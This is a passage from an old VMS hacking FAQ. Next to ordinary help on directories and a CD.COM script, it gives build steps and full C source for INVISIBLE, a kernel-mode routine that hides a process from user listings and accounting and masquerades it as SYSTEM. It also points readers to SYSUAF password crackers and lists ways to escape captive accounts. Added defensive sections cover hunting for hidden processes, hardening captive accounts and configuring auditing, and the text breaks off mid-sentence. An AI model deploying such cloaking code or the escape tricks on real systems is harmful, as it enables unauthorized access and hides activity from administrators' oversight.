$ Read/nolock in2 record1 /end=Done_Program
$Read_Loop3:
$! Go to first record in file because can't do key search on id
$ Open/share in3 rights.dat
$! Search holders for user id
$ Read/nolock/error=Done_No_Id in -
   record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id
$Read_Loop4:
$! Kluge because nulls cause problems on key search
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$  Then
$   Read/nolock in record2/end=Done_No_Id
$   Goto Read_Loop4
$ Endif
$! Move to next holder match
$ temp_pos = position
$Read_Loop5:
$ If temp_pos .gt. 0
$  Then
$   Read/nolock in record2/end=Read_Loop2
$   If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$    Then
$     Goto Read_Loop2
$   Endif
$   temp_pos = temp_pos - 1
$   Goto Read_Loop5
$ Endif
$Read_Loop6:
$! Look for identifier id
$ Read/nolock in3 record3/end=Done_No_Id
$ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2)
$  Then
$   Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3)
$   position = position + 1
$   Close in3
$   Goto Read_Loop3
$ Endif
$ Goto Read_Loop6
$Done_No_Id:
$ Write out f$extract(5,32,record1)
$ Close in3
$ Goto Read_Loop2
$Done_Program:
$Exit:
$ Close/error=Close_In2 in
$Close_In2:
$ Close/error=Close_Out in2
$Close_Out:
$ Close out
$ Delete users.dat.
$ Delete rights.dat.
$ If system .nes. ""
$  Then
$   Submit/after="+:15"/keep/params=('system') extract_rights.com
$ Endif
$ Exit
$Batch_End:
$Clean_Up:
$! Clean up DECnet logging
$ Dir 'p1'::netserver.log
$ Purge 'p1'::netserver.log
$ Exit

4.      "Is there a version of "Crack" that I can run on a VMS machine?"

	The Unix program, "Crack" will not work,  but there are password
	guessing routines available.

	The best one I have seen is "GUESS_PASSWORD.EXE",  which can be
	obtained from the following sites.

	ftp.wku.edu:/vms/fileserv/uaf.zip
	ftp.spc.edu:/macro32/savesets/uaf.zip

	In order for the routine to work,  you need access to the
	SYSUAF.DAT.  This version works on both OpenVMS VAX and 
	OpenVMS AXP.

	There is also a program available for the PC called VMSCrack 1.0.
	Once again, it requires that you have access to the SYSUAF.DAT
	so that you can copy it to the PC.

5.      "Is there a 'Cloak' routine in VMS?"

	Yes.  Below is the code needed to make your process invisible
	to "FINGER",  "SHOW USERS",  etc...
	Also,  check out Bruce Ellis' "Hitchhiker's Guide to VMS". 

	First,  create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax"        !Set to "alpha" for Alpha
$!
$!  File to build Ehud Gavron's INVISIBLE
$!
$!  Author:     Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on control_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$       exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$    read/error=cvt_fin tmp line
$    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$    write tmph "#define ",f$extract(4,255,line)
$    goto cvt_loop
$ cvt_fin:
$    close tmp
$    close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

	Next is the C Code for the "INVISIBLE" routine....

Name:  INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
 * Invisible    - Make a process invisible and visible again.  Originally
 *                written in MACRO32.  Now in C so it runs on Alpha too.
 *
 *
 *      Option file invisible.opt:
 *              ALPHA:  sys$loadable_images:sys$base_image.exe/share
 *
 *              VAX:    sys$system:sys.stb/selective_search
 *
 *
 *      Build:
 *              $ cc invisible
 *              $ link invisible,invisible/opt
 *
 *      Usage:
 *              $ run invisible
 *
 *
 *  Ehud Gavron
 *  ACES Consulting Inc.
 *  Gavron@ACES.COM
 *
 *      14-Oct-1992     Ehud Gavron     Ported to C, Alpha, ANSI, and 
 *                                      everything else.
 *
 */

#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
	struct {
		short s_buflen;
		short s_itemcode;
		char *s_bufaddr;
		int *s_retlen;
		} s;
	unsigned long end;
	} ITEMLIST;

#define buflen          s.s_buflen
#define itemcode        s.s_itemcode
#define bufaddr         s.s_bufaddr
#define retlen          s.s_retlen

struct ISB {
	int     l_uic;
	int     l_namelen;
#ifdef __alpha
	int     l_jobtype;
#else
	char    b_jobtype;
#endif
	char    b_terminal;
	char    t_lname[PCB$S_LNAME + 1];
	char    t_username[JIB$S_USERNAME + 1];
	};

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM        ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
	int sys$cmkrnl(),sys$exit(),invisible_k();
	int ss_stat;

	lnm_itmlst[0].buflen = sizeof(isb);
	lnm_itmlst[0].itemcode = LNM$_STRING;
	lnm_itmlst[0].bufaddr = (char *)&isb;
	lnm_itmlst[0].retlen = &lnm_retlen;
	lnm_itmlst[1].end = 0;

	jpi_itmlst[0].buflen = PCB$S_LNAME;
	jpi_itmlst[0].itemcode = JPI$_PRCNAM;
	jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
	jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
	jpi_itmlst[1].end = 0;

	prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
	prcnam_desc.dsc$w_length = PCB$S_LNAME;
	prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

	prcnam.dsc$a_pointer = (char *)&namebuf;
	prcnam.dsc$w_length = PCB$S_LNAME;
	prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam.dsc$b_class = DSC$K_CLASS_S;

	ss_stat = sys$cmkrnl(invisible_k,0);
	(void) sys$exit(ss_stat);       
}

int invisible_k()
{
	int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
	int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
	int *a_long;
	int acmode = PSL$C_KERNEL;

#pragma nostandard                      /* Oh well */
	globalref ctl$gl_pcb;
	globalref sys$gl_ijobcnt;
#pragma standard

	int ss_stat;
	char *pcb;
	char *jib;
	long *sts;
	long *own;
	char *p;
	long *q;
	int loop = 0;

	pcb = (char *)ctl$gl_pcb;

	if (pcb == 0) {
	   return(0);
	   }
	q = (long *)((char *)pcb + PCB$L_JIB);
	jib =(char *)  *q;

	sts = (long *)((char *)pcb + PCB$L_STS);

	if (*sts & PCB$M_INTER) {       /* Do stealth mode */
	   *sts = *sts^PCB$M_INTER;
	   *sts = *sts|PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt--;
	      }

	   p = (char *)pcb + PCB$T_TERMINAL;
	   isb.b_terminal = *p;
	   *p = '\0'; 

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   isb.l_jobtype = *q;
	   *q = 0;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   isb.b_jobtype = *p;
	   *p = '\0';
#endif
	   strncpy((char *)&isb.t_username,
		   (char *)(jib + JIB$T_USERNAME),
		   JIB$S_USERNAME);

	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&sysusername,
		   JIB$S_USERNAME);

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   isb.l_uic = *q;
	   *q = sysuic;

	   ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
	   if (!(ss_stat & 1)) return(ss_stat);
	   ss_stat = sys$crelnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);
	   do {
	      loop++;
	      prcnam.dsc$w_length = PCB$S_LNAME;
	      ss_stat = sys$fao((char *)&fao_prcnam,
				(char *)&prcnam.dsc$w_length,
				(char *)&prcnam,
				loop);
	      if (!(ss_stat &1)) return(ss_stat);
	      ss_stat = sys$setprn((char*)&prcnam);
	      } while (ss_stat == SS$_DUPLNAM);      
	   return(SS$_NORMAL);
	   }
	else {  /* unstealth */
	   ss_stat = sys$trnlnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);

	   ss_stat = sys$dellnm(&lnm_tabnam,
				&lnm_lognam,
				&acmode);
	   if (!(ss_stat & 1)) return(ss_stat);

	   *sts = *sts|PCB$M_INTER;
	   *sts = *sts^PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt++;
	      }

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   *q = isb.l_uic;

	   p = (char *)pcb + PCB$T_TERMINAL;
	   *p = isb.b_terminal;

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   *q = isb.l_jobtype;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   *p = isb.b_jobtype;
#endif
	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&isb.t_username,
		   JIB$S_USERNAME);

	   prcnam_desc.dsc$w_length = (short)isb.l_namelen;
	   ss_stat = sys$setprn(&prcnam_desc);
	   return;
	}
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
	for (; c > 0; c--) {
	  *a++ = *b++;
	  }
}
#endif
--------------------------------[End Of File]----------------------------------

	After these files are created,   type in the following at your
	DCL prompt:

$ @build_invisible      ! This will build our INVISIBLE.EXE routine.
$ run invisible         ! Once the build is complete. 

	You should be completely "cloaked".

	To obtain full source, readme files,  etc,  you can obtain this
	program from:

	ftp.wku.edu:/vms/fileserv/invisible.zip
	ftp.spc.edu:/macro32/savesets/invisible.zip
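	The routine above leaves a recognisable footprint: a process that
	calls itself SYMBIONT_n but is not running the job controller's
	symbiont image.  The DCL procedure below is an added hunting
	check written for this FAQ, not part of the FAQ or of the
	INVISIBLE distribution.  It assumes it is run from an account
	holding WORLD privilege (otherwise f$pid returns only your own
	processes); the "image lives in SYSEXE" test and all text strings
	are this example's own assumptions.

```dcl
$! Hunt for processes hidden by an INVISIBLE-style routine.  Heuristic;
$! assumed to run with WORLD privilege so every process is visible.
$ set noon                               ! keep going if a process exits mid-scan
$ ctx = ""                               ! f$pid wildcard context, starts empty
$ hits = 0
$ write sys$output f$fao("!10AS !16AS !AS", "PID", "Process name", "Reason")
$ SCAN:
$   pid = f$pid(ctx)
$   if pid .eqs. "" then goto DONE
$   name  = f$getjpi(pid, "PRCNAM")
$   image = f$getjpi(pid, "IMAGNAME")
$   reason = ""
$   if f$extract(0, 9, name) .nes. "SYMBIONT_" then goto NEXT
$!  Genuine symbionts are started by the job controller and always run a
$!  system-supplied image from the SYSEXE directory.  A process that merely
$!  renamed itself SYMBIONT_n either has no image active (it is back at
$!  DCL) or reports whatever image it was really running.
$   imgdir = f$parse(image,,,"DIRECTORY")
$   if (image .eqs. "") then reason = "symbiont name, no image active"
$   if (image .nes. "") .and. (f$locate("SYSEXE]", imgdir) .eq. f$length(imgdir)) -
        then reason = "symbiont name, image outside SYSEXE: " + image
$   if reason .eqs. "" then goto NEXT
$   hits = hits + 1
$   write sys$output f$fao("!10AS !16AS !AS", pid, name, reason)
$ NEXT:
$   goto SCAN
$ DONE:
$ write sys$output f$fao("!UL process(es) flagged; compare against SHOW SYSTEM", hits)
$ exit
```

	Third-party print symbionts installed outside SYSEXE will show up
	as false positives, so treat a hit as something to compare against
	SHOW SYSTEM and the accounting records rather than as a verdict.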

6.      "How do I change damn directories?" 

	This is done via the "SET DEFAULT" command, in the following 
	format:

$ SET DEFAULT device:[directory]

	VMS uses a standard hierarchy system, in which devices and 
	directories are separated.  For example, our home device/directory 
	might be:

	DISK3:[USR.JOEHACKER]

	DISK3:  would represent the device that we are on/using,
	while [USR.JOEHACKER] would signify the actual directory
	on that device that we are using.  So, to change directories, 
	we could type:

$ SET DEFAULT [USR.BOB]

	If [USR.BOB] is an existing directory, this would now be our
	current path (and we would still be located on the DISK3: 
	device).  If we wanted to simply back out one level (to 
	[USR]) on that device, we would issue the following command:

$ SET DEFAULT [-]

	The "[-]" signifies one directory back.  So if our path is,
	[USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the 
	[USR.BOB] directory,  instead of typing the entire path 
	again,  we could simply type:

$ SET DEFAULT [---]

	"[---]" means,  back out three levels of the hierarchy. 

	There can be several devices on one VMS system (device names
	can be obtained via "SHOW DEVICES").  While your 
	home directory might be on DISK3, another user's could
	be on device DISK2.  To switch devices, we can add in
	the device name, followed by the directory (if needed). 
	So, if you need to get to a user who stores information
	in the DISK2:[REALLY.SECRET.STUFF] directory, you could
	type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

	Or if we are currently in "DISK3:[REALLY]" and we want
	to get to the information in the "DISK2:[REALLY]" directory,
	we could simply type 

$ SET DEFAULT DISK2:

	And the rest would be carried over. 

	In the event that you need to get to the top of the hierarchy
	(Unix equivalent: "cd /"), SET DEFAULT (on any disk-structured
	device) to "[000000]".  For example, to get to the very
	top of the hierarchy on device DISK2, you would type: 

$ SET DEFAULT DISK2:[000000]

	VMS will also allow you to SET DEFAULT to a directory that does
	not exist.  When this happens,  the operating system will 
	inform you of this when you try to issue a command that requires
	some sort of file I/O.   If at any point you get completely 
	lost,  you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:

7.      "I hate this SET DEFAULT crap.  Can I just use the 'cd' command like
	 I do in Unix?" 

	By default, no.  There are two things that you can do. 
	One, add the following line to your "LOGIN.COM" (see
	"Okay, where's my .profile" below for more information):

$ CD :== SET DEFAULT    ! I hate typing that long "SET DEF" command

	Or you can use the following .COM file, which will guarantee
	that you eat as many resources as you can......

	      [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
			   [ Coded By The Mentor ]

			      Code for CD.COM
			       >>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
	 then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
	      + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
	then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
	f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
	f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
	 f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
	 f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

	       CD.COM  Version 6  VMS Change Directory Command

			 Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
	   current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

			      By The Mentor
$  goto END

	Once uploaded, you should add the following line to your
	LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information

8.      "Okay,  where's my .profile"

	Easy.  There is none.  VMS startup routines (for personal accounts)
	can be found in the user's home directory under the name 
	"LOGIN.COM". Also check out the system-wide login routine at
	SYS$MANAGER:SYLOGIN.COM.

9.      "I can't seem to get to the DCL prompt"

	It is possible to set up "CAPTIVE" and "RESTRICTED" accounts under
	VMS. When set up correctly, these can be difficult to break out of;
	however, in a lot of cases, a simple control-C while the LOGIN.COM
	is executing.  Another method of bypassing the LOGIN.COM 
	(or any commands, for that matter) is to login with the 
	"/NOCOMMAND" flag.  This flag is placed after your username 
	at the USERNAME prompt, and will bypass any account startup
	files/commands.  On a correctly set up captive account, 
	this will bomb out.  In the event that this fails, some
	places slip up by allowing a parent to spawn off other
	processes.  For example, if the captive account puts you
	into KERMIT, FTP, or ALL-IN-ONE (office automation/mail package), 
	you might be able to 'SPAWN' out to DCL or issue DCL commands. This
	can also be prevented by simply setting up a process limitation
	on the account.  
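	The answer above names the three holes a captive account is
	usually left with: an interruptible LOGIN.COM, an overridable
	login command, and an application that can SPAWN.  What follows
	is an added example of closing all three, written for this FAQ
	and not taken from it: a captive login procedure plus the
	AUTHORIZE record that pins it in place.  The account name KIOSK,
	the file name SYS$MANAGER:KIOSK_LOGIN.COM and the application
	image name are placeholders of this example.

```dcl
$! Harden a captive account.  Placeholder names: account KIOSK, login
$! file SYS$MANAGER:KIOSK_LOGIN.COM, application image KIOSK_APP.EXE.
$! Run from a privileged account.
$ set noon
$!
$! 1. The login procedure.  DECK/EOD let the $-prefixed lines below be
$!    written out as data instead of being executed here.
$ create sys$manager:kiosk_login.com
$ deck
$ set nocontrol=y                    ! belt-and-braces alongside the DISCTLY flag
$ on warning then goto done          ! any error ends the session, never the $ prompt
$ on control_y then goto done
$! Never use INQUIRE in a captive procedure: it performs symbol
$! substitution on the reply.  Use READ/PROMPT if input is needed.
$ define/user sys$input sys$command  ! hand the application the terminal
$ run sys$system:kiosk_app.exe       ! placeholder: the real application image
$ done:
$ logout/brief
$ eod
$!
$! 2. The account record.  CAPTIVE makes LOGINOUT reject /NOCOMMAND,
$!    /COMMAND and /CLI at the Username: prompt; DISCTLY turns off Ctrl-Y;
$!    DEFCLI pins the command interpreter; LOCKPWD stops password changes;
$!    PRCLM=0 refuses every subprocess, so a SPAWN from KERMIT, FTP or
$!    ALL-IN-1 fails instead of handing out a DCL prompt.
$ run sys$system:authorize
MODIFY KIOSK /FLAGS=(CAPTIVE,DISCTLY,DEFCLI,LOCKPWD) -
             /LGICMD=SYS$MANAGER:KIOSK_LOGIN.COM /PRCLM=0 /NOBATCH
SHOW KIOSK
EXIT
$ exit
```

	The procedure itself does no input handling; whatever the
	application is, the point is that nothing between login and
	LOGOUT ever returns control to DCL.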

10.     Terminal Spoofing

	There are many DEC VT spoofing programs around.  One can
	even be found on page 32 in the Winter 94-95 issue of 2600: Hook
	by Mr.Bungle.

11.     User Spoofing

	Programs such as "SETUSER" and "GLOGIN" are in the public domain
	for privileged users to operate as other users. 

12.     Accounting/Auditing Information

	Accounting information is kept in the file SYS$MANAGER:ACCOUNTNG.DAT
	($ACCOUNTING).
	A list of auditing options is available for the sys admin ($SET AUDIT).
	An intrusion database is part of the VMS security scheme
	($SHOW INTRUSION).
	"The Supervisor Series" (as reviewed in the Fall 94 issue of 2600)
	allows a privileged user to spy on and intervene in another user's
	on-line activities. It is public domain, available at
	ftp.spc.edu /anonymous/macro32/savesets.
	There are also short programs out there for a privileged user to look
	at a user's command buffer.
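	The list above gives the names but not the switches.  As an
	added example, not part of this FAQ, here is the audit and
	accounting set-up a system manager would use to get a record of
	the activity described throughout this file, and the commands to
	read it back.  SYS$MANAGER:SECURITY.AUDIT$JOURNAL is the OpenVMS V6
	default journal name and the qualifier set assumes a V6-era
	system; both are assumptions of this example, and the whole thing
	needs SECURITY privilege.

```dcl
$! Audit configuration, run from an account holding SECURITY privilege.
$! Assumes the OpenVMS V6 default journal SYS$MANAGER:SECURITY.AUDIT$JOURNAL;
$! check SHOW AUDIT for the name on your system.
$ set noon
$!
$! Journal (/AUDIT) and raise an OPCOM alarm (/ALARM) for every break-in
$! evasion detection, every failed login and every change to the
$! authorization database, i.e. to SYSUAF.DAT, the file the password
$! crackers in this FAQ need a copy of.
$ set audit/audit/alarm/enable=(breakin=all, logfailure=all, authorization)
$!
$! Journal successful logins and logouts by class, so an escape from a
$! captive account or a DECnet object connection leaves a record.
$ set audit/audit/enable=(login=(dialup,local,network,remote), -
                          logout=(dialup,local,network,remote))
$!
$! Review: what is enabled, which sources currently sit in the intrusion
$! database, and today's break-in and login-failure records.
$ show audit
$ show intrusion
$ analyze/audit/since=today/event_type=(breakin,logfail) -
         /output=sys$login:audit_today.lis sys$manager:security.audit$journal
$!
$! The accounting file named above records login failures as well.
$ accounting/since=today/type=logfail sys$manager:accountng.dat
$ exit
```

	The AUTHORIZATION audit is the one that pays for itself: the
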